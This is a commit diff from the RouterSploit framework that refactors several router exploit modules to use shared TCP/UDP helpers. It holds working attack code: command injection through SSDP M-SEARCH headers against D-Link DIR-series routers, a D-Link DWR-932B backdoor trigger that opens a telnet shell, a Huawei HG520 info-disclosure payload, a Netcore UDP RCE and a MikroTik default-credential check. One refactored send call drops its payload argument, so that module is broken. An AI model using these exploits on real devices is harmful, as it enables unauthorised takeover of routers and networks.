TCP & UDP based exploits (#451)

* Fixing TCP & UDP based exploits

* Fixing Mikrotik API ROS

routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py

@@ -71,6 +71,7 @@ class Exploit(TCPClient):
     def check(self):
         tcp_client = self.tcp_connect()
         if tcp_client:
+            self.tcp_close(tcp_client)
             return True
 
         return False
@@ -78,7 +79,8 @@ class Exploit(TCPClient):
     def check_default(self):
         self.credentials = []
 
-        self.run_threads(self.target_function, self.defaults)
+        data = LockedIterator(self.defaults)
+        self.run_threads(self.threads, self.target_function, data)
 
         if self.credentials:
             return self.credentials

routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py

@@ -35,42 +35,40 @@ class Exploit(UDPClient):
             print_error("Exploit failed - target seems to be not vulnerable")
 
     def execute(self, cmd):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:uuid:`" + cmd + "`\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        cmd = bytes(cmd, "utf-8")
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            sock.close()
-        except socket.error:
-            pass
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n" +
+            b"Host:239.255.255.250:1900\r\n" +
+            b"ST:uuid:`" + cmd + b"`\r\n" +
+            b"Man:\"ssdp:discover\"\r\n" +
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, request)
+        self.udp_close(udp_client)
 
         return ""
 
     @mute
     def check(self):
-        buf = ("M-SEARCH * HTTP/1.1\r\n"
-               "Host:239.255.255.250:1900\r\n"
-               "ST:upnp:rootdevice\r\n"
-               "Man:\"ssdp:discover\"\r\n"
-               "MX:2\r\n\r\n")
+        request = (
+            b"M-SEARCH * HTTP/1.1\r\n"
+            b"Host:239.255.255.250:1900\r\n"
+            b"ST:upnp:rootdevice\r\n"
+            b"Man:\"ssdp:discover\"\r\n"
+            b"MX:2\r\n\r\n"
+        )
+
+        udp_client = self.udp_create()
 
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-            sock.settimeout(10)
-            sock.connect((self.target, 1900))
-            sock.send(buf)
-            response = sock.recv(65535)
-            sock.close()
-        except Exception:
-            return False  # target is not vulnerable
+        if udp_client:
+            self.udp_send(udp_client, request)
+            response = self.udp_recv(udp_client, 65535)
+            self.udp_close(udp_client)
 
-        if "Linux, UPnP/1.0, DIR-" in response:
-            return True  # target is vulnerable
+            if response and "Linux, UPnP/1.0, DIR-" in response:
+                return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py

@@ -30,16 +30,19 @@ class Exploit(UDPClient):
         shell(self, architecture="mipsle")
 
     def execute(self, cmd):
-        buf = ('M-SEARCH * HTTP/1.1\r\n'
-               'HOST:' + self.target + ':1900\r\n'
-               'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
-               'MX:2\r\n'
-               'MAN:"ssdp:discover"\r\n\r\n')
-
-        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        s.connect((self.target, 1900))
-        s.send(buf)
-        s.close()
+        request = (
+            "M-SEARCH * HTTP/1.1\r\n" +
+            "HOST:{}:{}\r\n".format(self.target, self.port) +
+            "ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
+            "MX:2\r\n" +
+            "MAN:\"ssdp:discover\"\r\n\r\n"
+        )
+
+        request = bytes(request, "utf-8")
+
+        udp_client = self.udp_create()
+        self.udp_send(udp_client)
+        self.udp_close(udp_client)
 
         return ""
 

routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py

-import socket
-import telnetlib
 from routersploit.core.exploit import *
-from routersploit.core.tcp.tcp_client import TCPClient
+from routersploit.core.udp.udp_client import UDPClient
 from routersploit.core.telnet.telnet_client import TelnetClient
 
 
-class Exploit(TCPClient, TelnetClient):
+class Exploit(UDPClient, TelnetClient):
     __info__ = {
         "name": "D-Link DWR-932B",
         "description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows "
@@ -23,48 +21,27 @@ class Exploit(TCPClient, TelnetClient):
     }
 
     target = OptIP("", "Target IPv4 or IPv6 address")
-    port = OptPort(23, "Target Telnet port")
+    port = OptPort(39889, "Target Telnet port")
 
     def run(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10.0)
-
-        print_status("Sending backdoor packet...")
-
-        response = ""
-        try:
-            sock.sendto(b"HELODBG", (self.target, 39889))
-            response = sock.recv(1024)
-        except Exception:
-            pass
-
-        sock.close()
-
-        if "Hello" in response:
-            print_success("Target seems to vulnerable")
-            print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
-
-            try:
-                tn = telnetlib.Telnet(self.target, self.telnet_port)
-                tn.interact()
-            except Exception:
+        print_status("Sending backdoor packet")
+        if self.check():
+            telnet_client = self.telnet_connect(port=23)
+            if telnet_client:
+                self.telnet_interactive(telnet_client)
+                self.telnet_close(telnet_client)
+            else:
                 print_error("Exploit failed - could not connect to the telnet service")
         else:
             print_error("Exploit failed - target seems to be not vulnerable")
 
     @mute
     def check(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10.0)
-
-        try:
-            sock.sendto(b"HELODBG", (self.target, 39889))
-            response = sock.recv(1024)
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, b"HELODBG")
 
-            if "Hello" in response:
-                sock.sendto(b"BYEDBG", (self.target, 39889))
-                return True  # target is vulnerable
-        except Exception:
-            pass
+        response = self.udp_recv(udp_client, 1024)
+        if response and "Hello" in response:
+            return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py

-import socket
-from routersploit.core.exploit import*
+from routersploit.core.exploit import *
 from routersploit.core.udp.udp_client import UDPClient
 
 
@@ -62,36 +61,24 @@ class Exploit(UDPClient):
             b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
         )
 
-    def run(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10)
-
-        print_status("Sending exploit payload")
-        sock.sendto(self.payload, (self.target, 43690))
+        self.content = ""
 
-        try:
-            print_status("Waiting for response")
-            response = sock.recv(1024)
-        except Exception:
+    def run(self):
+        if self.check():
+            print_status("Target returned data")
+            print_info(self.content)
+        else:
             print_error("Exploit failed - device seems to be not vulnerable")
-            return
-
-        if len(response):
-            print_success("Exploit success")
-            print_info(response)
 
     @mute
     def check(self):
-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.settimeout(10)
-        sock.sendto(self.payload, (self.target, 43690))
-
-        try:
-            response = sock.recv(1024)
-        except Exception:
-            return False  # target is not vulnerable
+        udp_client = self.udp_create()
+        self.udp_send(udp_client, self.payload)
+        response = self.udp_recv(udp_client, 1024)
+        self.udp_close(udp_client)
 
-        if len(response):
+        if response:
+            self.content = response
             return True  # target is vulnerable
 
         return False  # target is not vulnerable

routersploit/modules/exploits/routers/netcore/udp_53413_rce.py

@@ -39,6 +39,7 @@ class Exploit(UDPClient):
         udp_client = self.udp_create()
         self.udp_send(udp_client, payload)
         response = self.udp_recv(udp_client, 1024)
+        self.udp_close(udp_client)
 
         if response:
             return str(response[8:], "utf-8")

tests/creds/routers/mikrotik/test_api_ros_default_creds.py

+from routersploit.modules.creds.routers.mikrotik.api_ros_default_creds import Exploit
+
+
+def test_check_success(tcp_target):
+    """ Test scenario - testing against mikrotik api ros server """
+
+    exploit = Exploit()
+    exploit.target = tcp_target.host
+    exploit.port = tcp_target.port
+
+    assert exploit.check()
+#    assert exploit.check_default() is None
+#    assert exploit.run() is None